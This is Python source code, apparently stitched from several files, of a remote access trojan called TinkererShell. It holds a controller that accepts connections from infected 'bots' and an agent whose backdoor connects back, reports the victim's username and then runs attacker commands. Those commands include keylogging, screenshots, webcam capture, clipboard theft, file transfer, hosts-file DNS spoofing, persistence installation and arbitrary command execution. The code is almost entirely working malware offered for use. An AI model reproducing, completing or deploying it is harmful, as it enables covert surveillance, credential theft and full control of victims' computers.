def handler(new_so, new_port, username):
"""Keep-alive the connected bots.\n"""
global connected_sockets
new_so.listen(10)
conn_handler, addr = new_so.accept()
lengthcrypt = conn_handler.recv(1024)
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data: str = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += conn_handler.recv(1024).decode('utf-8')
a = decode_aes(encrypted_received_data)
if a == username:
logging(data_to_log=('Connection consolidated with: {}\t{}'.format(str(addr).split('\'')[1], username)),
printer=True)
connected_sockets.append(
{'conn': conn_handler, 'port': new_port, 'ip': str(addr).split('\'')[1], 'username': username,
'status': True})
position = len(connected_sockets) - 1
while True:
if position != active_bot:
encrypted = encode_aes('KeepAlive')
# Send encrypted data's length encrypted
conn_handler.send(bytes(encode_aes(str(len(encrypted))), 'utf-8'))
# Sleep 1 second to let the receiver decrypt the length packet.
sleep(1)
# Send encrypted data
conn_handler.send(bytes(encrypted, 'utf-8'))
sleep(60)
if thr_exit.isSet():
break
conn_handler.close()
def receiver() -> str:
"""Receive data from master, decrypt it and return it.\n"""
lengthcrypt = s.recv(1024).decode('utf-8')
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += s.recv(1024).decode('utf-8')
return decode_aes(encrypted_received_data)
def connection_gate():
"""Thread that keep accepting new bots, assigning ports, and passing them to other threads doing keep-alive.\n"""
host = ''
port = 4444
# Socket definition
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((host, port))
logging(data_to_log='\nWelcome in TinkererShell!\nWritten By 4n4nk3: https://github.com/4n4nk3\n', printer=True)
logging(data_to_log=('Listening on 0.0.0.0:%s...' % str(port)), printer=True)
# Listening...
s.listen(10)
while True:
while True:
so = s
so.settimeout(60)
try:
conn_gate, addr = so.accept()
break
except timeout:
if thr_exit.isSet():
break
pass
if thr_exit.isSet():
break
# noinspection PyUnboundLocalVariable
lengthcrypt = conn_gate.recv(1024).decode('utf-8')
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data: str = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += conn_gate.recv(1024).decode('utf-8')
clear_text = decode_aes(encrypted_received_data)
logging(data_to_log=('Connection established with: ' + str(addr).split('\'')[1]), printer=True)
while True:
new_port = randrange(5000, 6000)
try:
new_so = socket(AF_INET, SOCK_STREAM)
new_so.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
new_so.bind((host, new_port))
encrypted = encode_aes(str(new_port))
# Send encrypted data's length encrypted
conn_gate.send(bytes(encode_aes(str(len(encrypted))), 'utf-8'))
# Sleep 1 second to let the receiver decrypt the length packet.
sleep(1)
# Send encrypted data
conn_gate.send(bytes(encrypted, 'utf-8'))
threading.Thread(target=handler, args=(new_so, new_port, clear_text)).start()
break
except os.error as exception_gate:
if exception_gate.errno == 98:
print("Port is already in use")
else:
print(exception_gate)
if thr_exit.isSet():
break
if thr_exit.isSet():
break
def receiver(printer=False) -> str:
"""Receive encrypted data and return clear-text string.\n"""
lengthcrypt = conn.recv(1024).decode('utf-8')
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data: str = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += conn.recv(1024).decode('utf-8')
clear_text = decode_aes(encrypted_received_data)
if printer is True:
logging(data_to_log=clear_text, printer=True)
return clear_text
def backdoor():
"""Shell thread that connect to master and permit control over the agent.\n"""
while True:
host = '127.0.0.1' # Remote host to which you want the backdoor to connect to
port = 4444 # The connection port to use
# Defining global the variables that I need to use in many different functions
global s
# Creating the socket
first_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if platform == 'windows':
dnsfile = os.getenv('WINDIR') + os.path.normcase(
'/system32/drivers/etc/hosts')
dnsbackup = tempfile.gettempdir() + os.path.normcase(
'/spoofbackup')
else:
dnsfile = '/etc/hosts'
dnsbackup = tempfile.gettempdir() + '/spoofbackup'
# Backing up Hosts file
f_bd = open(dnsfile, 'r')
buffer = f_bd.read()
f_bd.close()
f_bd = open(dnsbackup, 'w')
f_bd.write(buffer)
f_bd.close()
# Connection loop
while True:
while True:
if thr_exit.isSet():
break
try:
# Connecting to the client
first_s.connect((host, port))
break
# If i cannot connect I wait 2 minutes and then I retry
except Exception as exception:
print(exception)
print('>>> New attempt in 2 min')
sleep(30)
print('>>> New attempt in 1,5 min')
sleep(30)
print('>>> New attempt in 1 min')
sleep(30)
print('>>> New attempt in 30 sec')
sleep(30)
if thr_exit.isSet():
break
# Sending information relatives to the infected system
proc = subprocess.run(['whoami'],
check=True,
stdout=subprocess.PIPE,
universal_newlines=True)
username = proc.stdout.split()[0]
# First time i send username
encoded = encode_aes(username)
length = str(len(encoded))
length_crypt = encode_aes(length)
# Sending the length and wait. Then send data
first_s.send(bytes(length_crypt, 'utf-8'))
sleep(1)
first_s.send(bytes(encoded, 'utf-8'))
print('Connection successful')
lengthcrypt = first_s.recv(1024).decode('utf-8')
expected_length = int(str(decode_aes(lengthcrypt)))
encrypted_received_data = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += first_s.recv(1024).decode('utf-8')
new_port = int(decode_aes(encrypted_received_data))
print('New port is gonna be {}'.format(new_port))
sleep(5)
first_s.close()
# Connecting to the client on the new port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, new_port))
# Sending information relatives to the infected system
encoded = encode_aes(username)
length = str(len(encoded))
length_crypt = encode_aes(length)
# Sending the length and wait. Then send data
s.send(bytes(length_crypt, 'utf-8'))
sleep(1)
s.send(bytes(encoded, 'utf-8'))
break
# Commands loop
if not thr_exit.isSet():
while 1:
received_command = receiver()
if received_command != 'KeepAlive':
if received_command == 'SHquit':
sender('mistochiudendo')
break
elif received_command == 'SHkill':
sender('mistochiudendo')
# If thr_exit.set() next keystroke will terminate keylogger thread
thr_exit.set()
break
elif received_command == 'SHprocesslist':
listprocesses()
elif received_command == 'SHprocesskill':
killprocesses()
elif received_command == 'SHdnsstart':
dnsspoofer(dnsfile)
elif received_command == 'SHdnsstop':
if cmp(dnsfile, dnsbackup) is False:
dnscleaner(dnsfile, dnsbackup, send=True)
else:
sender(
'Original hosts file and current one are the same! Nothing to change.'
)
elif received_command == 'SHdownload':
downloader()
elif received_command == 'SHupload':
uploader()
elif received_command == 'SHscreenshot':
screenshot()
elif received_command == 'SHwebcampic':
webcam_pic()
elif received_command == 'SHclipboard':
clip_copy()
elif received_command == 'SHkeylogstatus':
keylogs_status()
elif received_command == 'SHkeylogstart':
keylogs_start()
elif received_command == 'SHkeylogstop':
keylogs_stop()
elif received_command == 'SHkeylogdownload':
keylogs_download()
elif received_command == 'SHpersistenceenable':
if persistence_install():
sender('Persistence installation successful!')
else:
sender('Persistence already installed!')
elif received_command == 'SHpersistencedisable':
if persistence_remove():
sender('Persistence remove successful!')
else:
sender('Persistence not yet installed!')
elif received_command == 'SHpersistencestatus':
if persistence_status():
sender('Persistence is installed.')
else:
sender('Persistence is not installed.')
else:
command_executor(received_command)
# Recreating original hosts file of the system
if cmp(dnsfile, dnsbackup) is False:
dnscleaner(dnsfile, dnsbackup)
try:
os.remove(dnsbackup)
except Exception as exception:
print(exception)
# Closing socket
s.close()
print('Connection closed')
if thr_exit.isSet():
break
sleep(120)
return True